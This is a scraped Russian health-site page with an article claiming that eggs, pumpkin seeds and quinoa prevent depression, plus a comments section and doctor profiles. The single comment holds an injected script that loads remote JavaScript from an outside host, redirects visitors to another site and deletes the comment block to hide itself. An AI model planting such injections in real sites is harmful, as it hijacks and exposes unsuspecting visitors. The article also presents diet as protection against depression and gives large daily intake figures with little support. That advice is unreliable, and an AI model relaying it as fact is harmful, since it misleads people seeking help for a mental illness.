Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Три суперпродукта для бор...  >>  Три суперпродукта для борьбы с депрессией
 
Обратная связь
 

Три суперпродукта для борьбы с депрессией

Размер шрифта
12 марта 2012 10:00
  • google_analytics: false
  • Нравится

Депрессия – это не блажь и не каприз, это болезнь, внесенная в список психических заболеваний. Чтобы человек не погрузился в депрессию, в его рационе должны присутствовать три продукта. Именно они обеспечат организм веществами, повышающими настроение.

1

Яйца

В составе яиц, а именно желтков, есть два важных витамина группы В, влияющих на настроение человека. Это витамины В6 и В12.

Витамины группы В сами по себе отлично влияют на функционирование нервных клеток. Витамины В6 и В12 стимулируют образование серотонина в организме. Серотонин – это нейротрансмиттер (передатчик), при помощи которого происходит передача нервных импульсов. Снижение уровня серотонина в организме является биологической предпосылкой к возникновению депрессии.

В желтке есть еще одно полезное вещество – холин. Это предшественник ацетил-холина, передатчика нервных импульсов в мозге.

В разумных количествах употребление яиц приводит к стимуляции работы мозга и возвращает радость жизни.

1

Тыквенные семечки

В тыквенных семечках содержится большое количество магния. Серотонин – главный гормон радости – вырабатывается в организме из аминокислоты триптофана, но для того, чтобы это происходило, необходимо достаточное количество магния.

Если в организме мало магния, то и серотонина выработается недостаточно, что будет негативно влиять на настроение человека.

1

Кинва

Это растение, произрастающее в Южной Америке, но не относится к злаковым, как может показаться на первый взгляд. Это растение – родственник овощей, таких как свекла и шпинат. Листья кинвы используют в салатах, а из семян делают муку, которая используется для выпечки разных изделий. Мука кинвы состоит из сложных, нерафинированных, углеводов, поэтому изделия из нее не вызывают всплесков глюкозы в крови и постоянного ощущения голода, а в результате – перемен в настроении. Более того, кинва содержит большое количество триптофана.

Рекомендуемое количество потребления

  • Не более 1 желтка в день и 4-х желтков в неделю.
  • 150 г тыквенных семечек в день.
  • 100 г кинвы в день.


Сюжеты по теме
:
Еда против депрессии
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.